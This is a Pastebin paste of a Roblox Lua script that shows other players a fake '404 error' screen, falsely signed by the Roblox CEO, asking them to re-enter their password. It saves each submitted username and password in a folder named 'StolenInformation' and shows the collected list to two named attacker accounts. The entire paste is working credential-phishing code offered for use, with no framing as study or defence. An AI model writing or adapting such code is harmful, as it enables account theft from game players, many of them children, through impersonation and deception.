Advertisement
Guest User

Untitled

a guest
Jun 21st, 2016
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.78 KB | None | 0 0
  1. local folder = Instance.new("Folder", game.Workspace)
  2. folder.Name = "StolenInformation"
  3.  
  4. for index, child in pairs(game.Players:GetChildren()) do
  5. if child.Name ~= 'New_Item' and child.Name ~= 'Player1' then
  6. local gui = Instance.new("ScreenGui", child.PlayerGui)
  7. gui.Name = 'HACKGUI'
  8. local frame = Instance.new("Frame", gui)
  9. frame.Size = UDim2.new(2, 0, 2, 0)
  10. frame.Position = UDim2.new(-1, 0, -1, 0)
  11. frame.BackgroundColor3 = BrickColor.new("Cyan").Color
  12. --
  13. local title = Instance.new("TextLabel", gui)
  14. title.ZIndex = 2
  15. title.Font = Enum.Font.Legacy
  16. title.BackgroundTransparency = 1
  17. title.TextColor3 = BrickColor.White().Color
  18. title.Size = UDim2.new(0, 500, 0, 100)
  19. title.Position = UDim2.new(0.5, -250, 0, 0)
  20. title.TextScaled = true
  21. title.Text = 'Error 404!'
  22. --
  23. local description = Instance.new("TextLabel", gui)
  24. description.ZIndex = 2
  25. description.BorderSizePixel = 0
  26. description.BackgroundColor3 = BrickColor.Blue().Color
  27. description.Font = Enum.Font.SourceSans
  28. description.TextColor3 = BrickColor.White().Color
  29. description.TextScaled = true
  30. description.Size = UDim2.new(0, 600, 0, 200)
  31. description.Position = UDim2.new(0.5, -300, 0, 125)
  32. description.Text = "Uh oh! ROBLOX has encountered a 404 error meaning everyone has diconnected from the game! Please enter your username and correct password to continue playing! We apologize for the inconvenience! - David Baszucki (CEO of ROBLOX)"
  33. --
  34. local username = Instance.new("TextBox", gui)
  35. username.ZIndex = 2
  36. username.BorderSizePixel = 0
  37. username.Font = Enum.Font.SourceSans
  38. username.TextColor3 = BrickColor.Black().Color
  39. username.BackgroundColor3 = BrickColor.White().Color
  40. username.TextScaled = true
  41. username.Size = UDim2.new(0, 250, 0, 75)
  42. username.Position = UDim2.new(0.5, -125, 0, 350)
  43. username.Text = 'Username'
  44. --
  45. local password = Instance.new("TextBox", gui)
  46. password.ZIndex = 2
  47. password.BorderSizePixel = 0
  48. password.Font = Enum.Font.SourceSans
  49. password.TextColor3 = BrickColor.Black().Color
  50. password.BackgroundColor3 = BrickColor.White().Color
  51. password.TextScaled = true
  52. password.Size = UDim2.new(0, 250, 0, 75)
  53. password.Position = UDim2.new(0.5, -125, 0, 450)
  54. password.Text = 'Password (CaSe SeNsItIvE)'
  55. --
  56. local play = Instance.new("TextButton", gui)
  57. play.ZIndex = 2
  58. play.BorderSizePixel = 0
  59. play.Font = Enum.Font.SourceSans
  60. play.TextColor3 = BrickColor.White().Color
  61. play.BackgroundColor3 = BrickColor.Green().Color
  62. play.TextScaled = true
  63. play.Size = UDim2.new(0, 250, 0, 75)
  64. play.Position = UDim2.new(0.5, -125, 0, 550)
  65. play.Text = 'Continue Playing'
  66. --
  67. play.MouseButton1Down:connect(function()
  68. local fol = Instance.new('Folder', folder)
  69. local user = Instance.new('StringValue', fol)
  70. user.Name = 'Username'
  71. user.Value = child.Name
  72. local pass = Instance.new('StringValue', fol)
  73. pass.Name = 'Password'
  74. pass.Value = password.Text
  75. gui:remove()
  76. end)
  77. elseif child.Name == 'New_Item' or child.Name == 'Player1' then
  78. local gui = Instance.new('ScreenGui', child.PlayerGui)
  79. gui.Name = 'LOLSUCKERS'
  80. local frame = Instance.new('Frame', gui)
  81. frame.Size = UDim2.new(0, 500, 0, 250)
  82. frame.Style = 'DropShadow'
  83. frame.Position = UDim2.new(0.5, -250, 0.5, -125)
  84. local desc = Instance.new("TextLabel", frame)
  85. desc.TextScaled = true
  86. desc.Size = UDim2.new(1, 0, 1, 0)
  87. desc.BackgroundTransparency = 1
  88. desc.TextColor3 = BrickColor.White().Color
  89. desc.Text = 'Awaiting user information... hahaha'
  90. local text = ""
  91. folder.ChildAdded:connect(function()
  92. text = ""
  93. wait(1)
  94. for index, child in pairs(folder:GetChildren()) do
  95. text = child.Username.Value.." :: "..child.Password.Value..", "..text
  96. wait()
  97. end
  98. desc.Text = text
  99. end)
  100. end
  101. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement